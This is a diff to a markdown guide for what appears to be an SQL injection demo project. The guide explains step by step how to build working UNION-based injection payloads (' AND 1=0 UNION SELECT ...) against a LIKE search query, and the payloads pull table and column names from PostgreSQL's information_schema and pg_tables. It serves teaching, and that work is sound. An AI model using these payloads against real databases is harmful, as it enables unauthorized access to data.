daystudio/demo-sqlinjection.python/SQL_INJECTION_GUIDE.md

 **Important:** The query has `WHERE computer_name LIKE '%{search_term}%' OR ip_address LIKE '%{search_term}%'`, so we need to:
 1. Close the LIKE clause with `'`
-2. Make the WHERE condition true with `OR '1'='1'`
+2. Use `AND 1=0` to ensure the original query returns no results
-3. Use UNION to inject our query
+3. Use UNION to inject our query (must return 3 columns matching: id, computer_name, ip_address)
+4. Use integer `1` for the first column to match the `id` (integer) type
-4. Comment out the rest with `--`
+5. Comment out the rest with `--`

 ### 1. Extract Table Names and Columns

 **Payload:**
 ```
-' OR '1'='1' UNION SELECT CAST(table_name AS text), CAST(column_name AS text), CAST(data_type AS text) FROM information_schema.columns WHERE table_schema='public' --
+' AND 1=0 UNION SELECT 1, table_name, column_name FROM information_schema.columns WHERE table_schema='public' --
 ```

 **What it does:**
 - `'` closes the LIKE clause
-- `OR '1'='1'` makes the WHERE condition always true
+- `AND 1=0` ensures the original query returns no results (shows only UNION SELECT data)
 - `UNION SELECT` injects our query
-- `CAST(...AS text)` ensures data type compatibility (id is integer, but we cast to text)
+- `1` (integer) matches the `id` column type
-- Returns table names, column names, and data types
+- Returns table names and column names
 - `--` comments out the rest of the query

 **Expected Result:**
+- ID column shows `1`
 - Table names appear in "Computer Name" column
 - Column names appear in "IP Address" column
-- Data types appear in "ID" column

 ### 2. Extract Just Table Names

 **Payload:**
 ```
-' OR '1'='1' UNION SELECT CAST(tablename AS text), null, null FROM pg_tables WHERE schemaname='public' --
+' AND 1=0 UNION SELECT 1, tablename, null FROM pg_tables WHERE schemaname='public' --`
 ```

 **What it does:**